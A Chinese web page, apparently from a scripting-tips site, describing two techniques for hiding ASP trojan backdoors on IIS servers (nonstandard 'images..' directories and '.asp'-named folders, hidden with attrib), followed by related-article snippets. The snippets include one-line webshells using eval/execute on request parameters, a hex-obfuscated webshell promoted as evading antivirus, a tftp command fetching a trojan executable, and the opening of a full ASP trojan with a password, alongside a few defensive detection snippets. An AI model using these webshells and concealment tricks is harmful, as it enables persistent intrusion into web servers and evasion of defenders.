隐藏ASP木马后门的两种方法
1、建立非标准目录:mkdir images..\
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
通过web访问ASP木马:http://ip/images../news.asp?action=login
如何删除非标准目录:rmdir images..\ /s
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
mkdir programme.asp
新建1.txt文件内容:
新建12.jpg文件内容: 或使用GIF与ASP合并后的文件
attrib +H +S programme.asp
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
相关推荐
-
asp.net jscript 一句话木马
min.aspx 复制代码 代码如下: <%@ Page Language="Jscript"%><%eval(Request.Item["z"],"unsafe");%> 复制代码 代码如下: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/x
-
asp一句话木马原理分析
通过HTTP协议来访问 一句话木马的使用范围(我只列举了2种): 1)只有数据库备份的情况 数据库备份成asp文件时候,不出现" 编译错误,缺少脚本关闭标志%>" 2)SA权限的时候,一般先写入一句话,图个方便..(当然,直接tftp上传鸽子运行,那更快) tftp -i ip get server.exe 一句话木马<%execute request("a")%>的原理: 首先知道 execute()函数,是用来执行asp代码的.就是负责执行我们
-
ASP防止图片木马上传的代码
ASP木马防御: 复制代码 代码如下: const adTypeBinary=1 dim jpg(1):jpg(0)=CByte(&HFF):jpg(1)=CByte(&HD8) dim bmp(1):bmp(0)=CByte(&H42):bmp(1)=CByte(&H4D) dim png(3):png(0)=CByte(&H89):png(1)=CByte(&H50):png(2)=CByte(&H4E):png(3)=CByte(&H4
-
如何防范ASP木马
修改三个组件来达到防asp木马攻击.FileSystemObject组件---对文件进行常规操作.WScript.Shell组件---可以调用系统内核运行DOS命令.Shell.Application组件--可以调用系统内核运行DOS命令. 一.使用FileSystemObject组件 1.可以通过修改注册表,将此组件改名,来防止此类木马的危害. HKEY_CLASSES_ROOT\Scripting.FileSystemObject\改名为其它的名字,如:改为FileSystemObject_
-
更牛的一句话asp木马加密(去掉asp里的%)
不知道怎样表达清楚.看例子吧: 复制代码 代码如下: <script language=vbs runat=server> Execute(HextoStr("65786563757465287265717565737428636872283335292929")) Function HextoStr(data) HextoStr="EXECUTE """"" C="&CHR(&
-
一句话木马的原理及利用分析(asp,aspx,php,jsp)
一句话木马的适用环境: 1.服务器的来宾账户有写入权限 2.已知数据库地址且数据库格式为asa或asp 3.在数据库格式不为asp或asa的情况下,如果能将一句话插入到asp文件中也可 一句话木马的工作原理: "一句话木马"服务端(本地的html提交文件) 就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 <%execute request("
-
asp,php一句话木马整理方便查找木马
特把经常用到的网页后门的木马整理下,如果不全请大家补全他,大家在网站混口饭吃,都不容易何必呢 asp一句话木马 文件常见内容 <%If Request("#")<>"" Then Execute(Request("#"))%> execute(request("#")); eval(request("#")); php一句话木马 <?@include($_POST["
-
有效防止ASP木马上传运行—小知识[网络安全技术]
一般现今ASP木马常通过以下四点来操作服务器,所以我们只要将一下四处设置好就能从一 前使用IIS服务器的站长很多,特别是对于ASP网站来说,防止ASP木马成了网站安全最关键的内容. 一般现今ASP木马常通过以下四点来操作服务器,所以我们只要将一下四处设置好就能从一定程度上有效防止ASP木马的入侵 一.使用FileSystemObject组件 FileSystemObject可以对文件进行常规操作 可以通过修改注册表,将此组件改名,来防止此类木马的危害. HKEY_CLASSES_ROOT\Scr
-
防范ASP木马的十大基本原则强列建议看下
由于ASP它本身是服务器提供的一项服务功能,特别是最近由dvbbs的upfile文件出现漏洞以来,其高度的隐蔽性和难查杀性,对网站的安全造成了严重的威胁.因此针对ASP木马的防范和清除,为网管人员提出了更高的技术要求. 几个大的程序全部被发现存在上传漏洞,小程序更是不计其数,让asp木马一下占据了主流,得到广泛的使用,想必如果你是做服务器的话,一定为此头疼不止吧,特别是虚拟主机的用户都遇到过网页被篡改.数据被删除的经历,事后除了对这种行径深恶痛绝外,许多客户又苦于没有行之有效的防范措施.鉴于大部
-
ASP下检测图片木马的函数代码
木马原理:入侵者使用诸如ASP图片木马生成器之类的工具将一张正常的图片与一个ASP木马文件合并成一个图片文件(即将对网站有害的 ASP代码插在图片编码之后,虽然图片仍然可以正常显示,但是文件内容和尺寸已被改变),然后通过网站提供的文件上传功能上传这一张"合 '法的"图片,进而实现了上传ASP木马的目的. ' 防范方法:因为这种木马是图片与木马的二合一,所以需要在上传图片前检查文件内容,若文件内容不合法(即包含有恶意代码在里面), '则禁止上传,从而堵住了木马攻击的源头,这是木马攻击的第
-
一句话 asp木马加密版 彻底突破杀毒软件
不知道怎样表达清楚.看例子吧: 复制代码 代码如下: <script language=vbs runat=server> Execute(HextoStr("65786563757465287265717565737428636872283335292929")) Function HextoStr(data) HextoStr="EXECUTE """"" C="&CHR(&H
-
aspx超强木马查杀与防范(web网马)
复制代码 代码如下: <%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%><%@ import Namespace="System.IO"%><
-
一款不错的asp木马 黑色界面
<% Server.ScriptTimeout=999999999 Response.Buffer =true On Error Resume Next UserPass="643617" '密码 mName="BY:.尐飛" '后门名字 Copyright="注:请勿用于非法用途,否则后果作者概不负责" '版权 Server.ScriptTimeout=9
随机推荐
- 关于1.5版本各种脚本的形式及使用方法
- 伪静态下不能使用FCKeditor的解决方法
- Lua中使用table实现的其它5种数据结构
- jquery实现倒计时小应用
- AngularJS $on、$emit和$broadcast的使用
- firefox下frameset取不到值的解决方法
- javascript(jquery)利用函数修改全局变量的代码
- php源代码安装常见错误与解决办法分享
- JSP与JS交互问题 值传递
- 巧用CCProxy 解决服务器无法上网问题
- Windows2003网络服务器安全攻略
- IO多路复用之poll全面总结(必看篇)
- 利用python批量检查网站的可用性
- 给IE 7添加任意搜索引擎
- 详解OkSocket与Android的简单使用
- spring AOP自定义注解方式实现日志管理的实例讲解
- C#中结构体定义并转换字节数组详解
- python 筛选数据集中列中value长度大于20的数据集方法
- 如何从官网下载Hibernate jar包的方法示例
- 易语言自编数组排序的方法